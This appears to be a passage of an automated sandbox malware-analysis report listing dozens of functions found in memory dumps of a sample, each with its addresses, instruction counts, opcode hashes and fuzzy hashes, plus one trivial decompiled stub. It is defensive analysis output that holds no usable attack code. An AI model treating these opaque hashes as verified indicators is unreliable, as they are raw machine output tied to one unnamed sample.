                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                        • Instruction ID: 76244176b94d692ca013fad9debef65839e6fbc9648f9d81e3d3c4b64a14178e
                                                        • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                        • Instruction Fuzzy Hash: ADD0E939352980CFD61BCB1DC594B1677A4BB44B44FC50494E505CB762E62CDA44CA10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018135A1 Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                        • Instruction ID: 0ac62b7fd24bc4367e5942abcd7f71947e5cc24a04aa705baca1905a119bdf38
                                                        • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                        • Instruction Fuzzy Hash: BBD0A733411185BDDB01AF18C1187E87B7BBB00B28F581065E9018555EC3354B09C601
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017EDB40 Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                        • Instruction ID: 322a5750881898638a416704d3613ffdc18161ced75beae4939ea124c3cb0705
                                                        • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                        • Instruction Fuzzy Hash: 19C08C302D0A01AAFB321F24CE01B007AE1BB10B01F4400A06300DA0F0EB78DD01E600
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0186A537 Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                        • Instruction ID: 634917c72780a9da21d87f35c90702f4ff479fd24cf0a53710f03b60718e5a87
                                                        • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                        • Instruction Fuzzy Hash: 1CC01232080648BBCB526E85CC00F067B2AEBA4B60F008010BA080A5A0C632EAB0EA84
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00417331 Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 37%
                                                        			E00417331(void* __eax) {

				asm("lodsb");
				return __eax;
			}



                                                        0x00417331
                                                        0x0041733c

                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_400000_SecuriteInfo.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dd637ca287c0b952369bd1c1c0f853867d2b859473253d647ed24e63417e0908
                                                        • Instruction ID: c990166277eec0e79a55d23f2bebff84a173a8a6e1199e6c2f962a7cdc8715e6
                                                        • Opcode Fuzzy Hash: dd637ca287c0b952369bd1c1c0f853867d2b859473253d647ed24e63417e0908
                                                        • Instruction Fuzzy Hash: FEA00117F460180144649C8A78410B4E768D1C7077D5032A7DE0CB35001402C425019D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01803A1C Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                        • Instruction ID: 6fbbffcf68ef22aca6209614778916f312e80a0e3c6e255375a8049c5b07ee3f
                                                        • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                        • Instruction Fuzzy Hash: FFC08C32080648BBC7126E45DD00F017B29E7A0B60F000020B7040A5A0C532ED60D588
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017EAD30 Relevance: .0, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                        • Instruction ID: 04279ac6c8924afabab59608015a6839b525da21ba1443d1626cc072cb63170e
                                                        • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                        • Instruction Fuzzy Hash: 63C08C3208024CBBC7226A49CD00F017B29E7A0BA0F000020B6044A6A2C932E960D588
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01814190 Relevance: .0, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 175590c6a7dfeeadbeeb5abb91333881fb225fd9a6b890b8f217439b73e8cc0c
                                                        • Instruction ID: 9b8f223246a2531bd768589419a450bae2856cd334fb6635d094bf403962a6fe
                                                        • Opcode Fuzzy Hash: 175590c6a7dfeeadbeeb5abb91333881fb225fd9a6b890b8f217439b73e8cc0c
                                                        • Instruction Fuzzy Hash: A1C04C357115418FCF56CB2DC6C4F1537E4F744744F150890EC05CB725E624E900CA11
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01898D47 Relevance: .0, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                        • Instruction ID: b657c6923ad1f994a45295b4b8a8856ff013c3a07584d98a09ca5232c68672b4
                                                        • Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                        • Instruction Fuzzy Hash: 01C09B1F1556C94DCE278F3443127D5BF60D7439D0F1D14C1E4D15F517C1144613D665
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01807D50 Relevance: .0, Instructions: 7COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                        • Instruction ID: 179da62642ffd6e911a06c953e4dbe85aa5d06aca4a496caba1589be1c8f43a0
                                                        • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                        • Instruction Fuzzy Hash: CFB092353029808FCE57DF18C480B1533E4BB44B40B8400D0E800CBA21D229EA008900
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01812ACB Relevance: .0, Instructions: 5COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                        • Instruction ID: 4bb1307a2e4d4b6cac296669c846988cff7fb2792f4c2fed414b9f7b161ef42c
                                                        • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                        • Instruction Fuzzy Hash: F2B01232C20445CFCF02EF44C610F1AB332FB00750F0644A4910167A30C628AC01CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018299A0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3379ab935c5b37c9b9224014dce9956f648ad1fdfa1f4d558914dacae14122d4
                                                        • Instruction ID: a6e72038cfd0818344dc713236c4592a0f3492d09f27a1ad9d47e53e97d8ad6d
                                                        • Opcode Fuzzy Hash: 3379ab935c5b37c9b9224014dce9956f648ad1fdfa1f4d558914dacae14122d4
                                                        • Instruction Fuzzy Hash: 7F9002A135100442D10061994414B060005E7E1342F95C115E2058664DC659CD6771A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018299D0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8e0c6b19579e88700482fe61908c9fee34c87e6a0c6c85852addaf50f4141ef7
                                                        • Instruction ID: 258c54abbca0e1d6a1f58f54cd757bc58492914544d4576faf56224acb1729ef
                                                        • Opcode Fuzzy Hash: 8e0c6b19579e88700482fe61908c9fee34c87e6a0c6c85852addaf50f4141ef7
                                                        • Instruction Fuzzy Hash: F79002A122100042D104619944047060045A7E1342F95C112A3148664CC5698D7661A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829910 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c9012cb6ca7aecdd0ddbf9a3d4f5840240f351886e89a970054ff260dbf64ed7
                                                        • Instruction ID: b9f3e9877cc8e86d3f590d63176fbdad2779a1a197ce7b7a5f96e64f17ee126d
                                                        • Opcode Fuzzy Hash: c9012cb6ca7aecdd0ddbf9a3d4f5840240f351886e89a970054ff260dbf64ed7
                                                        • Instruction Fuzzy Hash: 0D9002B121100402D140719944047460005A7D0342F95C111A6058664EC6998EEA76E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829950 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6e2810a07dd3250338b2a8217b4a7eafea03ca3f1cf8c127463d9888f35d1a8c
                                                        • Instruction ID: bc51b99777094b5d0cf403533b256a5534c5887079118801a9f17718f06ed525
                                                        • Opcode Fuzzy Hash: 6e2810a07dd3250338b2a8217b4a7eafea03ca3f1cf8c127463d9888f35d1a8c
                                                        • Instruction Fuzzy Hash: A29002A121140403D140659948046070005A7D0343F95C111A3058665ECA698D6671B5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018298A0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7c177107676dc8bf67d934432e782261951561e6df5e90253f4347a7e88ba956
                                                        • Instruction ID: f988c2f7f2a188698d13c2455919a65ce3beab4fb6ebe63a8c245ea2ed296b40
                                                        • Opcode Fuzzy Hash: 7c177107676dc8bf67d934432e782261951561e6df5e90253f4347a7e88ba956
                                                        • Instruction Fuzzy Hash: 6B90026131100402D102619944146060009E7D1386FD5C112E2418665DC6658A67B1B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018298F0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 60424297b0cafac55884f931c77468f0efb64c253ed15bf547f89d5bfa691a76
                                                        • Instruction ID: 74282583dc40ccada03654e0272780d6552e45675bf8e9ccf6efe741445702fe
                                                        • Opcode Fuzzy Hash: 60424297b0cafac55884f931c77468f0efb64c253ed15bf547f89d5bfa691a76
                                                        • Instruction Fuzzy Hash: 2790026161100502D10171994404616000AA7D0382FD5C122A2018665ECA658AA7B1B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829820 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b3d8dab8bced22d30d1b38343fe2d8299b94c0e8c5e6bbe95faf1ce1b92defbe
                                                        • Instruction ID: 4f716c5c53e8a5ffd032fc88b0ffd8ae4441a0d0a5094bedcd381b3353fed19c
                                                        • Opcode Fuzzy Hash: b3d8dab8bced22d30d1b38343fe2d8299b94c0e8c5e6bbe95faf1ce1b92defbe
                                                        • Instruction Fuzzy Hash: 9190027125100402D141719944046060009B7D0382FD5C112A1418664EC6958B6BBAE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829840 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 90b5bda9083ac05594b9d097d024cfb780026810b4eeda81bd8705b22fa4a90f
                                                        • Instruction ID: 7ac2847c78a9a1eff232d227983e0b8335f807dde60ae2e53096a6d9fa366b93
                                                        • Opcode Fuzzy Hash: 90b5bda9083ac05594b9d097d024cfb780026810b4eeda81bd8705b22fa4a90f
                                                        • Instruction Fuzzy Hash: D2900261252041525545B19944045074006B7E03827D5C112A2408A60CC566996BE6A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0182B040 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8b26216f39753e5a13e0b9ad3f25094f505b886576fb345e9a579b3821a7579f
                                                        • Instruction ID: a8ff8fc09fb778ffb214675a3939503b5569203374c605d2a06583ae2b8c34a3
                                                        • Opcode Fuzzy Hash: 8b26216f39753e5a13e0b9ad3f25094f505b886576fb345e9a579b3821a7579f
                                                        • Instruction Fuzzy Hash: C69002A1611140434540B19948044065015B7E13423D5C221A1448670CC6A8896AA2E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0182A3B0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 930b96912146c88c82547cfb3cfb794d9a8647c0b24faa56438330229a5010d6
                                                        • Instruction ID: c0b84912187f48731d44e89fd0c5118472bb3558d68f089df3de37eea68761ad
                                                        • Opcode Fuzzy Hash: 930b96912146c88c82547cfb3cfb794d9a8647c0b24faa56438330229a5010d6
                                                        • Instruction Fuzzy Hash: FC90027121144002D1407199844460B5005B7E0342F95C511E1419664CC655896BA2A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829B00 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d4499f0197e42380f64ee6ff4769d4fb904f392c6b8d2b0263d2d61ea639e1f5
                                                        • Instruction ID: 458ea09e039276b593b1877b5b68179a07b4da58949de617611da83f19b94c28
                                                        • Opcode Fuzzy Hash: d4499f0197e42380f64ee6ff4769d4fb904f392c6b8d2b0263d2d61ea639e1f5
                                                        • Instruction Fuzzy Hash: B690026125100802D140719984147070006E7D0742F95C111A1018664DC6568A7A76F1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829A80 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 46d1dc3ad076c0c35b12bc8b6a2558b0380c0b3a76889e85bb128ad27e24bd10
                                                        • Instruction ID: 181718f8d63f2c3cee7b9c6dd0fd86792b1460912ad71d6b5d280e2e17efe239
                                                        • Opcode Fuzzy Hash: 46d1dc3ad076c0c35b12bc8b6a2558b0380c0b3a76889e85bb128ad27e24bd10
                                                        • Instruction Fuzzy Hash: 0990026121144442D14062994804B0F4105A7E1343FD5C119A514A664CC955896A67A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829A00 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 39198117835ad5a416b544a597836081704d3c602d893cf86b32598bc3f81a3d
                                                        • Instruction ID: d0dded9e91117ee2e2d07f0ca6ceae2965c91bb04683beff79d4ca4d5b57fa2f
                                                        • Opcode Fuzzy Hash: 39198117835ad5a416b544a597836081704d3c602d893cf86b32598bc3f81a3d
                                                        • Instruction Fuzzy Hash: B190027121140402D1006199481470B0005A7D0343F95C111A2158665DC665896675F1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829A10 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0b4fb37186775ee5f3dfed5b6f7f64fe4dda2fb9a0020728d7eea1a8a7e594eb
                                                        • Instruction ID: 024fea91c34e963d6906f6c806e34975d32153d260375f718c9a80675981f72e
                                                        • Opcode Fuzzy Hash: 0b4fb37186775ee5f3dfed5b6f7f64fe4dda2fb9a0020728d7eea1a8a7e594eb
                                                        • Instruction Fuzzy Hash: 9F90027121140402D100619948087470005A7D0343F95C111A6158665EC6A5C9A675B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829A20 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 322616656f85484c314929fb5584ca6476cedf87420eb453f69f3129fb4622d4
                                                        • Instruction ID: 19aaebe9a63caa74ae4d2e7e735cb54f4304fe0461b97a800ae0579388c01ab0
                                                        • Opcode Fuzzy Hash: 322616656f85484c314929fb5584ca6476cedf87420eb453f69f3129fb4622d4
                                                        • Instruction Fuzzy Hash: 2D90026161100042414071A988449064005BBE1352795C221A198C660DC599897A66E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829A50 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d257f9fb1c240534c2f2dc50211afa83e99c7e27013ab8b5d6734f55cc3ed5b1
                                                        • Instruction ID: 50898331c0b0d8832c6c47043ac827205da9135b0f387707f602d02d64360849
                                                        • Opcode Fuzzy Hash: d257f9fb1c240534c2f2dc50211afa83e99c7e27013ab8b5d6734f55cc3ed5b1
                                                        • Instruction Fuzzy Hash: 3690026122180042D20065A94C14B070005A7D0343F95C215A1148664CC955897665A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018295D0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cdb461e4f35158aea15bde63eb2b94030c9a7237bea8bda29749b202d3388ad3
                                                        • Instruction ID: 073145145ab89a21309c2f8b5b1d54d58c7ce66f3186a476310d32f1bb243adb
                                                        • Opcode Fuzzy Hash: cdb461e4f35158aea15bde63eb2b94030c9a7237bea8bda29749b202d3388ad3
                                                        • Instruction Fuzzy Hash: D89002A121200003410571994414616400AA7E0342B95C121E20086A0DC56589A671A5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018295F0 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5573234b61b1836d5e8e1ba9a147a73b2840d96be7c9e537e882683d9e672158
                                                        • Instruction ID: ae19f97e490b5ef61a2048fc64ccb658853c0bee9f27afdf9f34c15ea288c3b3
                                                        • Opcode Fuzzy Hash: 5573234b61b1836d5e8e1ba9a147a73b2840d96be7c9e537e882683d9e672158
                                                        • Instruction Fuzzy Hash: 8D90027121100802D104619948046860005A7D0342F95C111A7018765ED6A589A671B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01829520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ffb0ba479d1e549a73d43e82f0ef7436fd033b8fb9a562388d20b44679003fb6
                                                        • Instruction ID: ddf5c8848bad8f5676e5515835c7a6dd0c3e749784f9cb82f136968e302f4d14
                                                        • Opcode Fuzzy Hash: ffb0ba479d1e549a73d43e82f0ef7436fd033b8fb9a562388d20b44679003fb6
                                                        • Instruction Fuzzy Hash: 629002E1211140924500A2998404B0A4505A7E0342B95C116E2048670CC5658966A1B5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0182AD30 Relevance: .0, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
